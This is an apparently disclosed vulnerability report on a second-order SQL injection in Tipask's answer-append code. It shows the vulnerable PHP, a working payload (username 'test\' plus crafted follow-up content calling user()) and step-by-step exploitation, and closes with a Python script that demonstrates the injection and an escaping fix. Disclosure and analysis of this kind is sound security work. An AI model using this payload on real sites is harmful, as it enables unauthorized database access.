### Brief description: SQL injection (second-order injection)

### Detailed description:

Tested against the latest official source. In `control/answer.php`:

```php
/* Follow-up module: append a follow-up */
function onappend() {
    $this->load("message");
    $qid = intval($this->get[2]) ? $this->get[2] : intval($this->post['qid']);
    $aid = intval($this->get[3]) ? $this->get[3] : intval($this->post['aid']);
    $question = $_ENV['question']->get($qid);
    $answer = $_ENV['answer']->get($aid);
    if (!$question || !$answer) {
        $this->message("回答内容不存在!");
        exit;
    }
    $viewurl = urlmap('question/view/' . $qid, 2);
    if (isset($this->post['submit'])) {
        //echo $this->user['username'];exit();
        $_ENV['answer']->append($answer['id'], $this->user['username'], $this->user['uid'], $this->post['content']);
        if ($answer['authorid'] == $this->user['uid']) { // the answerer continues their answer
            $_ENV['message']->add($this->user['username'], $this->user['uid'], $question['authorid'],
                $this->user['username'] . '继续回答了您的问题:' . $question['title'],
                $this->post['content'] . '<br /> <a href="' . url('question/view/' . $qid, 1) . '">点击查看</a>');
            $_ENV['doing']->add($this->user['uid'], $this->user['username'], 7, $qid, $this->post['content']);
            $this->message('继续回答成功!', $viewurl);
        } else { // the asker posts a follow-up question
            $_ENV['message']->add($this->user['username'], $this->user['uid'], $answer['authorid'],
                $this->user['username'] . '对您的回答进行了追问',
                $this->post['content'] . '<br /> <a href="' . url('question/view/' . $qid, 1) . '">点击查看问题</a>');
            $_ENV['doing']->add($this->user['uid'], $this->user['username'], 6, $qid, $this->post['content'],
                $answer['id'], $answer['authorid'], $answer['content']);
            $this->message('继续提问成功!', $viewurl);
        }
    }
    include template("appendanswer");
}
```

In the follow-up module the call

```php
$_ENV['answer']->append($answer['id'], $this->user['username'], $this->user['uid'], $this->post['content']);
```

passes `$this->user['username']`, which is read back from the database without any filtering, and `$this->post['content']`, the attacker-controlled follow-up text. Following `append()` into `model/answer.class.php`:

```php
/* Add a follow-up to an answer */
function append($answerid, $author, $authorid, $content) {
    //echo "INSERT INTO " . DB_TABLEPRE . "answer_append(appendanswerid,answerid,author,authorid,content,time) VALUES (NULL,$answerid,'$author',$authorid,'$content',{$this->base->time})";exit();
    $this->db->query("INSERT INTO " . DB_TABLEPRE . "answer_append(appendanswerid,answerid,author,authorid,content,time) VALUES (NULL,$answerid,'$author',$authorid,'$content',{$this->base->time})");
    return $this->db->insert_id();
}
```

An INSERT statement is built by string interpolation. Controlling `$author` is enough: register a malformed username such as `test\` or `test'`. With the username `test\`, the backslash escapes the quote that was meant to close the `author` literal, so the literal now runs on into `,4,` and is closed by the quote that was meant to open `content`. Everything in `content` is therefore parsed as SQL rather than as a string. Setting `content` to `,1,user(),1)#` (anything after `#` is a MySQL comment; the captured request used `#aaaa`) yields the following statement:

```sql
INSERT INTO ask_answer_append(appendanswerid,answerid,author,authorid,content,time) VALUES (NULL,1,'test\',4,',1,user(),1)#aaaa',1423503510)
```

which MySQL executes as

```sql
INSERT INTO ask_answer_append(appendanswerid,answerid,author,authorid,content,time) VALUES (NULL,1,'test\',4,',1,user(),1)
```

The `content` column now receives the result of `user()`, so the new follow-up is displayed with `root@localhost` in it.

Exploitation steps:

1. Register a user named `test\`.
2. Open http://localhost/tipask/?answer/append/1/1.html (a question must already exist and have an answer before a follow-up can be posted).

[![22222222222.png](https://images.seebug.org/upload/201502/10092104a18b862478688428e730575f7e500a60.png)](https://images.seebug.org/upload/201502/10092104a18b862478688428e730575f7e500a60.png)

   Intercept the request: the editor wraps the content in `<p>` tags, so strip those tags and then forward the request, as shown above.
3. The query result is displayed directly in the follow-up.

[![88888889999999.png](https://images.seebug.org/upload/201502/1009224581ecfc77ac40be42dd1efe04b3f5d47c.png)](https://images.seebug.org/upload/201502/1009224581ecfc77ac40be42dd1efe04b3f5d47c.png)

### Proof of vulnerability:

1. Register a user named `test\`.
2. Open http://localhost/tipask/?answer/append/1/1.html (a question must already exist and have an answer before a follow-up can be posted).

[![22222222222.png](https://images.seebug.org/upload/201502/10092104a18b862478688428e730575f7e500a60.png)](https://images.seebug.org/upload/201502/10092104a18b862478688428e730575f7e500a60.png)

   Intercept the request: the editor wraps the content in `<p>` tags, so strip those tags and then forward the request, as shown above.
3. The query result is displayed directly in the follow-up.

[![88888889999999.png](https://images.seebug.org/upload/201502/1009224581ecfc77ac40be42dd1efe04b3f5d47c.png)](https://images.seebug.org/upload/201502/1009224581ecfc77ac40be42dd1efe04b3f5d47c.png)
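To make the quote-swallowing visible without a live Tipask install, the following Python script (added here; it is not part of the report or of Tipask) rebuilds the INSERT from `append()` and runs a minimal MySQL-style string-literal tokenizer over it, listing the expressions the server would see in the VALUES list for a normal user, for the `test\` user with the report's payload, and after the `author` and `content` values are escaped `mysql_real_escape_string`-style. The `ask_` table prefix, uid 4 and the timestamp are taken from the report's example statement; the function names are the example's own.

```python
import re

TABLE = "ask_answer_append"  # prefix "ask_" as in the report's example statement


def build_append_query(answerid, author, authorid, content, time):
    """Mirror of Tipask's answer.class.php append(): every value is interpolated
    into the statement as-is (the vulnerable pattern, kept deliberately)."""
    return (f"INSERT INTO {TABLE}(appendanswerid,answerid,author,authorid,content,time) "
            f"VALUES (NULL,{answerid},'{author}',{authorid},'{content}',{time})")


def mysql_escape(s):
    """Escape the characters mysql_real_escape_string() escapes
    (server mode without NO_BACKSLASH_ESCAPES)."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


def build_append_query_safe(answerid, author, authorid, content, time):
    """Same statement with the string columns escaped and the numeric ones coerced.
    A prepared statement is the proper fix; this is the minimal change."""
    return build_append_query(int(answerid), mysql_escape(author), int(authorid),
                              mysql_escape(content), int(time))


def tokenize(sql):
    """Split sql into ('code'|'str'|'comment'|'unterminated', text) tokens the way
    MySQL lexes it: backslash escapes and '' doubling inside single-quoted
    literals, '#' outside a literal starts a comment that runs to the end."""
    tokens, buf, i, n = [], [], 0, len(sql)
    while i < n:
        c = sql[i]
        if c == "'":
            if buf:
                tokens.append(("code", "".join(buf)))
                buf = []
            lit, j = ["'"], i + 1
            while j < n:
                d = sql[j]
                if d == "\\" and j + 1 < n:          # backslash escape eats next char
                    lit.append(d + sql[j + 1]); j += 2; continue
                if d == "'":
                    if j + 1 < n and sql[j + 1] == "'":  # '' is an escaped quote
                        lit.append("''"); j += 2; continue
                    lit.append("'"); j += 1
                    break
                lit.append(d); j += 1
            else:
                tokens.append(("unterminated", "".join(lit)))
                return tokens
            tokens.append(("str", "".join(lit)))
            i = j
        elif c == "#":
            if buf:
                tokens.append(("code", "".join(buf)))
            tokens.append(("comment", sql[i:]))
            return tokens
        else:
            buf.append(c); i += 1
    if buf:
        tokens.append(("code", "".join(buf)))
    return tokens


def values_exprs(sql):
    """Return the expressions inside VALUES (...) as the server would see them,
    each string literal kept whole, or None if the statement is malformed."""
    literals, flat = [], []
    for kind, text in tokenize(sql):
        if kind == "str":                      # stand literals in with a placeholder
            flat.append(f"\x00{len(literals)}\x00")
            literals.append(text)
        elif kind == "code":
            flat.append(text)
        elif kind == "comment":
            break
        else:
            return None
    code = "".join(flat)
    m = re.search(r"VALUES\s*\(", code, re.I)
    if not m:
        return None
    exprs, depth, start, i = [], 1, m.end(), m.end()
    while i < len(code):
        ch = code[i]
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                exprs.append(code[start:i])
                break
        elif ch == "," and depth == 1:
            exprs.append(code[start:i])
            start = i + 1
        i += 1
    else:
        return None                            # VALUES list never closed
    restore = lambda e: re.sub("\x00(\\d+)\x00", lambda mm: literals[int(mm.group(1))], e).strip()
    return [restore(e) for e in exprs]


def content_reaches_sql(sql):
    """True when the 5th VALUES expression (the content column) is not a string
    literal, i.e. attacker-supplied text is being parsed as SQL."""
    exprs = values_exprs(sql)
    return exprs is not None and len(exprs) >= 5 and not exprs[4].startswith("'")


if __name__ == "__main__":
    cases = [build_append_query(1, "alice", 4, "hello", 1423503510),
             build_append_query(1, "test\\", 4, ",1,user(),1)#aaaa", 1423503510),
             build_append_query_safe(1, "test\\", 4, ",1,user(),1)#aaaa", 1423503510)]
    for sql in cases:
        print(sql)
        print("  values:", values_exprs(sql), " content parsed as SQL:", content_reaches_sql(sql))
```

Run stand-alone, the script prints the three statements: for `alice` the content column is the literal `'hello'`; for `test\` the fifth expression is `user()` and the real timestamp disappears into the `#` comment; after escaping, the username becomes `'test\\'`, the whole payload stays inside one literal and the statement again has six ordinary values.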